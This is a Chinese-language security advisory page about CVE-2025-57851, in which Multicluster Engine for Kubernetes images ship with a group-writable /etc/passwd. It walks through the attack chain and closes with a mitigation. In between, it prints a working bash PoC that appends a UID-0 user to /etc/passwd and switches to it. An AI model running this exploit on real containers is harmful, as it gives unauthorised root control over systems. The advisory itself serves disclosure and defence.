IPBUF安全漏洞报告
English
CVE-2025-57851 CVSS 6.4 中危

CVE-2025-57851 Kubernetes多集群引擎容器权限提升漏洞

披露日期: 2026-04-08

漏洞信息

漏洞编号
CVE-2025-57851
漏洞类型
权限提升
CVSS评分
6.4 中危
攻击向量
本地 (AV:L)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Multicluster Engine for Kubernetes

相关标签

权限提升容器安全Kubernetes本地攻击配置错误

漏洞概述

该漏洞是Kubernetes多集群引擎镜像中发现的容器权限提升缺陷。由于构建过程中/etc/passwd文件被错误地设置为组可写权限,攻击者若能以非root用户身份在容器内执行命令,且属于root组,即可修改/etc/passwd文件。利用此漏洞,攻击者可添加UID为0的任意用户,从而获取容器的完全root权限。

技术细节

该漏洞的核心在于Linux文件系统权限的误用。在受影响的Multicluster Engine for Kubernetes镜像构建过程中,/etc/passwd文件被赋予了过高的权限(组可写),这违反了最小权限原则。/etc/passwd是存储用户账户信息的核心文件。攻击者若能以非root用户身份进入容器,且该用户属于“root”组,即可利用此配置错误。攻击者通过向/etc/passwd文件追加一行数据,创建一个新用户,并将其UID(用户标识符)设置为0。在Linux系统中,UID 0等同于超级用户。因此,这个新建的用户无需通过sudo提权,直接拥有系统的最高控制权,能够读取、修改或删除容器内的任何文件,完全接管容器环境。

攻击链分析

STEP 1
初始访问
攻击者获得受影响容器内的Shell访问权限,身份为非root用户。
STEP 2
权限验证
攻击者确认当前用户属于root组,并检测到/etc/passwd文件具有组可写权限。
STEP 3
修改配置文件
攻击者利用写入权限,向/etc/passwd文件追加一行数据,创建一个UID为0的新用户账户。
STEP 4
权限提升
攻击者使用新账户登录或切换身份,由于UID为0,成功获取容器内的Root完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2025-57851: Container Privilege Escalation via group-writable /etc/passwd # Check if /etc/passwd is group-writable if [ -w /etc/passwd ]; then echo "[+] /etc/passwd is writable by current user/group." # Generate a password hash for the new root user 'hacker' # Password: 'password123' SALT=$(openssl rand -base64 6) HASH=$(openssl passwd -1 -salt "$SALT" "password123") # Create a new user entry with UID 0 (root) # Format: username:password:UID:GID:gecos:home:shell NEW_USER="hacker_x:${HASH}:0:0:Pwned:/root:/bin/bash" # Append the new user to /etc/passwd echo "$NEW_USER" >> /etc/passwd echo "[+] User 'hacker_x' added with UID 0." echo "[+] Attempting to switch to the new user..." # Switch to the new user (requires interactive shell in real scenario) su - hacker_x else echo "[-] /etc/passwd is not writable. Exploit failed." fi

影响范围

Multicluster Engine for Kubernetes (特定受影响镜像)

防御指南

临时缓解措施
在容器构建脚本中显式修正文件权限,确保/etc/passwd不可被组写入,并重新部署容器。同时,应检查现有运行中的容器,确保关键系统文件权限配置正确。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表